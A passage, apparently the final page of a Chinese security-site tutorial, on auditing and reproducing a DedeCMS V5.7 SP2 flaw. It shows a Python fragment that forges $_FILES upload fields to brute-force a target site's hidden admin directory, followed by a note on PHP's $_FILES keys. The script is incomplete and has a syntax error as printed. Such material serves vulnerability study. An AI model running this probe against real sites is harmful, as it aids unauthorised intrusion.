欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

代码审计入门级DedecmsV5.7 SP2分析复现

来源:本站整理 作者:佚名 时间:2018-08-26 TAG: 我要投稿
def find_page(response):
    if "Upload filetype not allow !" not in response.text and response.status_code == 200:
        return 1
def main():
    characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
    url = raw_input("Please input your target:")
    data = {
        "_FILES[hpdoger][tmp_name]": "./{p},
        "_FILES[hpdoger][name]": 0,
        "_FILES[hpdoger][size]": 0,
        "_FILES[hpdoger][type]": "image/gif"
    }
    back_dir = guess_back_dir(url,data,characters)
    name = guess_rest_dir(back_dir,url,data,characters)
    print("The background address is[+]:",name)
if __name__ == '__main__':
    main()
最后穿插一个关于FILE变量的小知识点
$_FILES[“file”][“name”] – 被上传文件的名称$_FILES[“file”][“type”] – 被上传文件的类型$_FILES[“file”][“size”] – 被上传文件的大小,以字节计$_FILES[“file”][“tmp_name”] – 存储在服务器的文件的临时副本的名称$_FILES[“file”][“error”] – 由文件上传导致的错误代码
 

上一页  [1] [2] [3] [4] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载